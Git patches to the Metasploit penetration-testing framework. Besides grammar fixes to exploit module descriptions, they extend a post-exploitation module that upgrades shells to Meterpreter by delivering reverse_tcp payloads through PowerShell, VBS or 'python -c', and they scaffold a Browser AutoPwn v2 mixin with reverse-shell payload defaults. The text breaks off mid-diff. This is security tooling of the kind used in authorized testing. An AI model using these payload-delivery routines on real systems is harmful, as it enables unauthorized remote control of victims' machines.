From 72794e4c1a71497a7205a292701d4d557aba0912 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 20 Mar 2015 01:16:49 +0000
Subject: [PATCH 0001/1013] Removed double spaces

---
 lib/msf/core/exploit/http/client.rb                      | 2 +-
 modules/exploits/windows/http/xampp_webdav_upload_php.rb | 2 +-
 modules/exploits/windows/iis/iis_webdav_upload_asp.rb    | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index a8ee210f38..f9a57f7f49 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -47,7 +47,7 @@ module Exploit::Remote::HttpClient
           Rex::Proto::Http::Client::DefaultUserAgent
           ]),
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
         OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
         OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
         OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb
index 5c3e8725b5..744519e2fd 100644
--- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb
+++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('PATH', [ true,  "The path to attempt to upload", '/webdav/']),
         OptString.new('FILENAME', [ false ,  "The filename to give the payload. (Leave Blank for Random)"]),
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', 'xampp'])
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
       ], self.class)
   end
 
diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
index f77ed98532..820a193e55 100644
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
         # The USERNAME and PASSWORD are registered again to make them more obvious they're
         # configurable.
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
         OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
       ], self.class)
   end

From 5709d49aae05760905e1bd9e80f5a8506f87a662 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 20 Mar 2015 01:19:46 +0000
Subject: [PATCH 0002/1013] Clean up traq_plugin_exec

---
 modules/exploits/multi/http/traq_plugin_exec.rb | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb
index 932d09f4b3..0f5e27af98 100644
--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an arbitrary command execution vulnerability in
         Traq 2.0 to 2.3. It's in the admincp/common.php script.
 
-        This function is called in each script located into /admicp/ directory to
+        This function is called in each script located in the /admicp/ directory to
         make sure the user has admin rights, but this is a broken authorization
-        schema due to the header() function doesn't stop the execution flow. This
-        can be exploited by malicious users to execute admin functionality resulting
-        for  e.g.  in execution of arbitrary PHP code leveraging of plugins.php
-        functionality.
+        schema due to the header() function doesn't stop the execution flow.
+        This can be exploited by malicious users to execute admin functionality.
+        e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

From 7426e723170962529e61844bfd864b94478d5718 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 20 Mar 2015 01:31:01 +0000
Subject: [PATCH 0003/1013] Grammar - traq_plugin_exec

---
 modules/exploits/multi/http/traq_plugin_exec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb
index 0f5e27af98..67657d131e 100644
--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
         Traq 2.0 to 2.3. It's in the admincp/common.php script.
 
         This function is called in each script located in the /admicp/ directory to
-        make sure the user has admin rights, but this is a broken authorization
-        schema due to the header() function doesn't stop the execution flow.
-        This can be exploited by malicious users to execute admin functionality.
+        make sure the user has admin rights. This is a broken authorization schema 
+        because the header() function doesn't stop the execution flow.
+        This can be exploited by malicious users to execute admin functionality,
         e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
       },
       'License'        => MSF_LICENSE,

From 127d07342e932ea15a16fcd691368f176925f86a Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 20 Mar 2015 01:36:56 +0000
Subject: [PATCH 0004/1013] Remove trailing space

---
 modules/exploits/multi/http/traq_plugin_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb
index 67657d131e..7c972720cb 100644
--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         Traq 2.0 to 2.3. It's in the admincp/common.php script.
 
         This function is called in each script located in the /admicp/ directory to
-        make sure the user has admin rights. This is a broken authorization schema 
+        make sure the user has admin rights. This is a broken authorization schema
         because the header() function doesn't stop the execution flow.
         This can be exploited by malicious users to execute admin functionality,
         e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.

From faa7ed2b68969f2e2741b3159c90c06d4c8633d9 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 13 Jun 2015 17:37:41 +0100
Subject: [PATCH 0005/1013] shell_to_meterpreter - more options, more verbose

...less bugs!
---
 .../post/multi/manage/shell_to_meterpreter.rb | 62 ++++++++++++++-----
 1 file changed, 45 insertions(+), 17 deletions(-)

diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index 7038742da4..5e06626ce5 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -31,16 +31,29 @@ class Metasploit3 < Msf::Post
         OptAddress.new('LHOST',
           [false, 'IP of host that will receive the connection from the payload.']),
         OptInt.new('LPORT',
-          [false, 'Port for Payload to connect to.', 4433]),
+          [false, 'Port for payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', true])
+          [ true, 'Start exploit/multi/handler to receive the connection.', true])
       ], self.class)
+    register_advanced_options([
+      OptInt.new('HANDLE_TIMEOUT',
+        [false, 'How long to wait for the session to come back', 30]),
+      OptString.new('WIN_TRANSFER',
+        [false, 'Which method to try first to transfer files on a Windows target. Valid values are: POWERSHELL, VBS', 'POWERSHELL']),
+      OptString.new('PAYLOAD_OVERWRITE',
+        [false, 'Overwrite the default payload', nil])
+    ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
 
-  # Run Method for when run command is issued
+  # Run method for when run command is issued
   def run
-    print_status("Upgrading session: #{datastore['SESSION']}")
+    print_status("Upgrading session ID: #{datastore['SESSION']}")
+
+    if session.type =~ /meterpreter/
+      print_error("Shell type is already Meterpreter.")
+      return nil
+    end
 
     # Try hard to find a valid LHOST value in order to
     # make running 'sessions -u' as robust as possible.
@@ -52,7 +65,7 @@ class Metasploit3 < Msf::Post
       lhost = session.tunnel_local.split(':')[0]
     end
 
-    # If nothing else works....
+    # If nothing else works...
     lhost = Rex::Socket.source_address if lhost.blank?
 
     lport = datastore['LPORT']
@@ -65,14 +78,17 @@ class Metasploit3 < Msf::Post
       lplat = [Msf::Platform::Windows]
       larch = [ARCH_X86]
       psh_arch = 'x86'
+      print_status("Platform: Windows") if datastore['VERBOSE']
     when /osx/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
+      print_status("Platform: OS X") if datastore['VERBOSE']
     when /solaris/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
+      print_status("Platform: Solaris") if datastore['VERBOSE']
     else
-      # Find the best fit, be specific w/ uname to avoid matching hostname or something else
+      # Find the best fit, be specific with uname to avoid matching hostname or something else
       target_info = cmd_exec('uname -mo')
       if target_info =~ /linux/i && target_info =~ /86/
         # Handle linux shells that were identified as 'unix'
@@ -80,12 +96,16 @@ class Metasploit3 < Msf::Post
         payload_name = 'linux/x86/meterpreter/reverse_tcp'
         lplat = [Msf::Platform::Linux]
         larch = [ARCH_X86]
+        print_status("Platform: Linux") if datastore['VERBOSE']
       elsif cmd_exec('python -V') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
         platform = 'python'
         payload_name = 'python/meterpreter/reverse_tcp'
+        print_status("Platform: Python [fallback]") if datastore['VERBOSE']
       end
     end
+    payload_name = datastore['PAYLOAD_OVERWRITE'] if datastore['PAYLOAD_OVERWRITE']
+    print_status("Upgrade payload: #{payload_name}") if datastore['VERBOSE']
 
     if platform.blank?
       print_error("Shells on the the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
@@ -101,28 +121,36 @@ class Metasploit3 < Msf::Post
     if datastore['HANDLER']
       listener_job_id = create_multihandler(lhost, lport, payload_name)
       if listener_job_id.blank?
-        print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
         return nil
       end
     end
 
     case platform
     when 'win'
-      if have_powershell?
+      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+        print_status("Transfer method: Powershell") if datastore['VERBOSE']
         psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
         cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
       else
+        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+        print_status("Transfer method: VBS [fallback]") if datastore['VERBOSE']
         exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
         aborted = transmit_payload(exe)
       end
     when 'python'
+      print_status("Transfer method: Python") if datastore['VERBOSE']
       cmd_exec("python -c \"#{payload_data}\"")
     else
+      print_status("Transfer method: Bourne shell [fallback]") if datastore['VERBOSE']
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
       aborted = transmit_payload(exe)
     end
 
-    cleanup_handler(listener_job_id, aborted) if datastore['HANDLER']
+    if datastore['HANDLER']
+      print_status("Cleaning up handler") if datastore['VERBOSE']
+      cleanup_handler(listener_job_id, aborted)
+    end
     return nil
   end
 
@@ -150,7 +178,7 @@ class Metasploit3 < Msf::Post
 
     cmds = cmdstager.generate(opts)
     if cmds.nil? || cmds.length < 1
-      print_error('The command stager could not be generated')
+      print_error('The command stager could not be generated.')
       raise ArgumentError
     end
 
@@ -160,6 +188,7 @@ class Metasploit3 < Msf::Post
     total_bytes = 0
     cmds.each { |cmd| total_bytes += cmd.length }
 
+    print_status("Starting transfer...") if datastore['VERBOSE']
     begin
       #
       # Run the commands one at a time
@@ -198,17 +227,16 @@ class Metasploit3 < Msf::Post
   def cleanup_handler(listener_job_id, aborted)
     # Return if the job has already finished
     return nil if framework.jobs[listener_job_id].nil?
-
     framework.threads.spawn('ShellToMeterpreterUpgradeCleanup', false) {
       if !aborted
         timer = 0
-        while !framework.jobs[listener_job_id].nil? && timer < 10
-          # Wait up to 10 seconds for the session to come in..
+        print_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back") if datastore['VERBOSE']
+        while !framework.jobs[listener_job_id].nil? && timer < HANDLE_TIMEOUT
           sleep(1)
           timer += 1
         end
       end
-      print_status('Stopping multi/handler')
+      print_status('Stopping exploit/multi/handler')
       framework.jobs.stop_job(listener_job_id)
     }
   end
@@ -218,7 +246,7 @@ class Metasploit3 < Msf::Post
   #
   def progress(total, sent)
     done = (sent.to_f / total.to_f) * 100
-    print_status("Command Stager progress - %3.2f%% done (%d/%d bytes)" % [done.to_f, sent, total])
+    print_status("Command stager progress: %3.2f%% (%d/%d bytes)" % [done.to_f, sent, total])
   end
 
   # Method for checking if a listener for a given IP and port is present
@@ -238,12 +266,12 @@ class Metasploit3 < Msf::Post
     return false
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihandler(lhost, lport, payload_name)
     pay = client.framework.payloads.create(payload_name)
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
-    print_status('Starting exploit multi handler')
+    print_status('Starting exploit/multi/handler')
     if !check_for_listener(lhost, lport)
       # Set options for module
       mh = client.framework.exploits.create('multi/handler')

From fc6860672b8346fffa3961c97ca156e34210e394 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 21 Mar 2015 01:57:13 +0000
Subject: [PATCH 0006/1013] Fix merge conflict due to #5527

...my mistake
---
 modules/post/multi/manage/shell_to_meterpreter.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index 5e06626ce5..c06e5f8c46 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
         OptInt.new('LPORT',
           [false, 'Port for payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start exploit/multi/handler to receive the connection.', true])
+          [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
     register_advanced_options([
       OptInt.new('HANDLE_TIMEOUT',

From b57eb0897efa5184fc9703daec3838018dde99c3 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 27 Mar 2015 03:08:24 -0500
Subject: [PATCH 0007/1013] BAP v2 place holder

---
 modules/exploits/multi/browser/autopwn.rb | 39 +++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 modules/exploits/multi/browser/autopwn.rb

diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
new file mode 100644
index 0000000000..135ad1c13f
--- /dev/null
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -0,0 +1,39 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HTTP Client Automatic Exploiter",
+      'Description'    => %q{
+        Place holder
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'sinn3r'
+        ],
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 5 2014",
+      'DefaultTarget'  => 0))
+  end
+
+
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, 'OK')
+  end
+
+
+end

From 4486831ba34e4128e1fe056caa8fb81234e9dd8d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 14 Apr 2015 01:33:02 -0500
Subject: [PATCH 0008/1013] Module loading portion

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 172 ++++++++++++++++++++++
 lib/msf/core/exploit/mixins.rb            |   1 +
 modules/exploits/multi/browser/autopwn.rb |   3 +-
 3 files changed, 175 insertions(+), 1 deletion(-)
 create mode 100644 lib/msf/core/exploit/browserautopwnv2.rb

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
new file mode 100644
index 0000000000..542b39b874
--- /dev/null
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -0,0 +1,172 @@
+###
+#
+# The Msf::Exploit::Remote::BrowserAutopwnv2 mixin is a replacement for the current BrowserAutoPwn
+#
+###
+
+
+module Msf
+  module Exploit::Remote::BrowserAutopwnv2
+
+    include Msf::Exploit::Remote::BrowserExploitServer
+
+    # @return [Array]
+    attr_reader :bap_exploits
+
+
+    # The default platform-specific payloads and preferred LPORTS
+    # The hash key is the name of the platform that matches what's on the module
+    DEFAULT_PAYLOADS = {
+      'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp', 'lport' => 4444 },
+      'linux'   => { 'payload' => 'linux/meterpreter/reverse_tcp',   'lport' => 4445 },
+      'osx'     => { 'payload' => 'osx/meterpreter/reverse_tcp',     'lport' => 4446 },
+      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',    'lport' => 4447 },
+      'android' => { 'payload' => 'android/meterpreter/reverse_tcp', 'lport' => 4448 },
+      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
+      'generic' => { 'payload' => 'generic/shell_reverse_tcp',       'lport' => 4450 }
+    }
+
+
+    # Returns all the found exploit modules that support BrowserExploitServer
+    #
+    # @return [Array] A collection of BES modules
+    def init_exploit_paths
+      @bap_exploits ||= lambda {
+        framework.exploits.find_all do |m|
+          next if m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
+          m.last.ancestors.include? Msf::Exploit::Remote::BrowserExploitServer
+        end
+      }.call
+    end
+
+
+    # Initializes all found BES exploits
+    #
+    # @return [void]
+    def init_exploits
+      init_exploit_paths.each do |m|
+        module_name = m.first
+        xploit = framework.exploits.create(module_name)
+        unless xploit
+          print_status("Failed to load: #{name}")
+          next
+        end
+        set_exploit_options(xploit)
+
+        # We don't have the :last method, so we retrieve at -1, which gives us the same thing
+        m[-1] = xploit
+      end
+    end
+
+
+    # Modifies an exploit's default datastore options
+    #
+    # @return [void]
+    def set_exploit_options(xploit)
+      p = pick_default_payload(xploit)
+      xploit.datastore['DisablePayloadHandler'] = true            # BAP should handle the handlers
+      xploit.datastore['PAYLOAD'] = p['payload']                  # We'll need this information later for multi handler
+      xploit.datastore['LPORT']   = p['lport']                    # We'll need this information later for multi handler
+      xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
+      xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
+      xploit.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0' # Attacker's IP
+      xploit.datastore['URI'] = "/#{assign_module_resource}"
+    end
+
+
+    # Checks if a resource is already taken or not
+    #
+    # @return [TrueClass] Resource is taken
+    # @return [FalseClass] Resource is not taken
+    def is_resource_taken?(resource)
+      taken = false
+
+      bap_exploits.each do |m|
+        obj = m.last
+        if obj.respond_to?(:datastore) && obj.datastore['URI'] == resource
+          # When a module has not be initialized, the object does not have the datastore
+          # method. So we need to check that first, so that we can access the URI option
+          # safely.
+          return true 
+        end
+      end
+
+      taken
+    end
+
+
+    # Returns a unique resource path
+    #
+    # @return [String]
+    def assign_module_resource
+      resource = ''
+      while
+        resource = Rex::Text.rand_text_alpha(rand(10) + 4)
+        break unless is_resource_taken?(resource)
+      end
+
+      resource
+    end
+
+
+    # Returns a preferred default payload. The load order is based on this preference:
+    # if there is a browser-specific payload (such as firefox), then we'll use that as default.
+    # And then we fall back to the module's platform. If there's nothing we can choose,
+    # then we'll just use the generic reverse shell.
+    #
+    # @param [Class] The initialized exploit object
+    # @return [Hash] The default payload information from DEFAULT_PAYLOADS
+    def pick_default_payload(m)
+      module_platforms = m.platform.platforms
+      preferred_payload = DEFAULT_PAYLOADS['generic']
+
+      # Specific load order
+      if module_platforms.include?('firefox')
+        preferred_payload = DEFAULT_PAYLOADS['firefox']
+      elsif module_platforms.include?('java')
+        preferred_payload = DEFAULT_PAYLOADS['java']
+      elsif module_platforms.include?('android')
+        preferred_payload = DEFAULT_PAYLOADS['android']
+      elsif module_platforms.include?('win')
+        preferred_payload = DEFAULT_PAYLOADS['win']
+      elsif module_platforms.include?('linux')
+        preferred_payload = DEFAULT_PAYLOADS['linux']
+      elsif module_platforms.include?('osx')
+        preferred_payload = DEFAULT_PAYLOADS['osx']
+      end
+
+      preferred_payload
+    end
+
+
+    # Sets up BAPv2. This is like our main function.
+    #
+    # @return [void]
+    def setup
+      super
+      print_status("Searching BES exploits, please wait...")
+      init_exploits
+      print_status("#{@bap_exploits.length} BES exploits found.")
+    end
+
+
+    # Overrides the original print_status. It will modify certain outputs to make messages more
+    # friendly to understand
+    def print_status(msg='')
+      case msg
+      when /Using URL: /
+        msg.gsub!('Using URL: ', '')
+        super("BrowserAutoPwn is using URL: #{msg}")
+      when /Local IP: /
+        msg.gsub!('Local IP: ', '')
+        super("Ask your target to visit this URL: #{msg}")
+      when /Server started\./
+        super("Browser AutoPwn has started.")
+      else
+        super(msg)
+      end
+    end
+
+
+  end
+end
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index cd7edc03f9..91024ae873 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -104,3 +104,4 @@ require 'msf/core/exploit/android'
 
 # Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'
+require 'msf/core/exploit/browserautopwnv2'
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 135ad1c13f..561cf509d7 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwnv2
 
   def initialize(info={})
     super(update_info(info,
@@ -25,6 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', {} ]
         ],
+      'Platform'       => %w{ java linux osx solaris win },
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
       'DefaultTarget'  => 0))

From 6c9cc7c72538981e4810b7f659cb79b9ba82148c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 14 Apr 2015 13:30:34 -0500
Subject: [PATCH 0009/1013] Some progress

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 62 +++++++++++++++--------
 modules/exploits/multi/browser/autopwn.rb | 30 +++++++----
 2 files changed, 63 insertions(+), 29 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 542b39b874..d6b30b2ca7 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -4,13 +4,14 @@
 #
 ###
 
+require 'Date'
 
 module Msf
   module Exploit::Remote::BrowserAutopwnv2
 
     include Msf::Exploit::Remote::BrowserExploitServer
 
-    # @return [Array]
+    # @return [Array] The exploit list BAP manages
     attr_reader :bap_exploits
 
 
@@ -33,7 +34,7 @@ module Msf
     def init_exploit_paths
       @bap_exploits ||= lambda {
         framework.exploits.find_all do |m|
-          next if m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
+          next if !m.first.include?('browser') || m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
           m.last.ancestors.include? Msf::Exploit::Remote::BrowserExploitServer
         end
       }.call
@@ -56,6 +57,21 @@ module Msf
         # We don't have the :last method, so we retrieve at -1, which gives us the same thing
         m[-1] = xploit
       end
+
+      # These can be done during initialization, so let's do that. But sort-by-requirement-count
+      # will have to occur after we actually have the target information.
+      $stderr.puts 
+      $stderr.puts list_bap_names
+      sort_by_disclosure_date
+      sort_by_rank
+      $stderr.puts
+      $stderr.puts list_bap_names
+    end
+
+    def list_bap_names
+      bap_exploits.each do |m|
+        $stderr.puts m.first
+      end
     end
 
 
@@ -139,6 +155,30 @@ module Msf
     end
 
 
+    # Modifies @bap_exploits by sorting BAP exploits by disclosure date
+    #
+    # @return [void]
+    def sort_by_disclosure_date
+      @bap_exploits = bap_exploits.sort_by {|m| Date.parse(m.last.disclosure_date.to_s)}.reverse
+    end
+
+
+    # Modifies @bap_exploits by sorting BAP exploits by ranking
+    #
+    # @return [void]
+    def sort_by_rank
+      @bap_exploits = bap_exploits.sort_by {|m| m.last.rank}
+    end
+
+
+    # Returns a list of suitable exploits for the current target
+    #
+    # @return [Array]
+    def find_suitable_exploits(target_info)
+      $stderr.puts target_info.inspect
+    end
+
+
     # Sets up BAPv2. This is like our main function.
     #
     # @return [void]
@@ -150,23 +190,5 @@ module Msf
     end
 
 
-    # Overrides the original print_status. It will modify certain outputs to make messages more
-    # friendly to understand
-    def print_status(msg='')
-      case msg
-      when /Using URL: /
-        msg.gsub!('Using URL: ', '')
-        super("BrowserAutoPwn is using URL: #{msg}")
-      when /Local IP: /
-        msg.gsub!('Local IP: ', '')
-        super("Ask your target to visit this URL: #{msg}")
-      when /Server started\./
-        super("Browser AutoPwn has started.")
-      else
-        super(msg)
-      end
-    end
-
-
   end
 end
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 561cf509d7..ddd3d93e8b 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -17,22 +17,34 @@ class Metasploit3 < Msf::Exploit::Remote
         Place holder
       },
       'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'sinn3r'
-        ],
-      'Targets'        =>
-        [
-          [ 'Automatic', {} ]
-        ],
-      'Platform'       => %w{ java linux osx solaris win },
+      'Author'         => [ 'sinn3r' ],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true # BAPv2 will set up our own
+      },
+      'Platform'       => %w{ java linux osx solaris win android firefox },
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [
+            'OSX Target',
+            {
+              :os_name => 'Mac OS X',
+              'Rop'   => :msvcrt,
+              'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
+              'Align' => 0x77c4d801  # add esp, 0x2c; ret
+            }
+          ]
+        ],
       'DefaultTarget'  => 0))
   end
 
 
   def on_request_exploit(cli, request, target_info)
+    $stderr.puts get_target.inspect
+    $stderr.puts find_suitable_exploits(target_info)
     send_exploit_html(cli, 'OK')
   end
 

From d9b77b0629fe9c3a7268948929dc80a4cd2b19eb Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 14 Apr 2015 17:05:33 -0500
Subject: [PATCH 0010/1013] Sorting

---
 lib/msf/core/exploit/browserautopwnv2.rb | 130 ++++++++++++++---------
 1 file changed, 81 insertions(+), 49 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index d6b30b2ca7..2dfa8ca381 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -15,8 +15,8 @@ module Msf
     attr_reader :bap_exploits
 
 
-    # The default platform-specific payloads and preferred LPORTS
-    # The hash key is the name of the platform that matches what's on the module
+    # The default platform-specific payloads and preferred LPORTS.
+    # The hash key is the name of the platform that matches what's on the module.
     DEFAULT_PAYLOADS = {
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp', 'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/meterpreter/reverse_tcp',   'lport' => 4445 },
@@ -28,23 +28,23 @@ module Msf
     }
 
 
-    # Returns all the found exploit modules that support BrowserExploitServer
+    # Returns all the found exploit modules that support BrowserExploitServer.
     #
-    # @return [Array] A collection of BES modules
+    # @return [Array] A collection of BES modules in this format: [module_fullname, Class].
     def init_exploit_paths
-      @bap_exploits ||= lambda {
-        framework.exploits.find_all do |m|
-          next if !m.first.include?('browser') || m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
-          m.last.ancestors.include? Msf::Exploit::Remote::BrowserExploitServer
-        end
-      }.call
+      framework.exploits.find_all do |m|
+        next if !m.first.include?('browser') || m.last == "__SYMBOLIC__" || m.last.fullname == self.fullname
+        m.last.ancestors.include? Msf::Exploit::Remote::BrowserExploitServer
+      end
     end
 
 
-    # Initializes all found BES exploits
+    # Initializes all found BES exploits.
     #
     # @return [void]
     def init_exploits
+      @bap_exploits = [] # Initialized BES modules are held here
+
       init_exploit_paths.each do |m|
         module_name = m.first
         xploit = framework.exploits.create(module_name)
@@ -53,29 +53,20 @@ module Msf
           next
         end
         set_exploit_options(xploit)
-
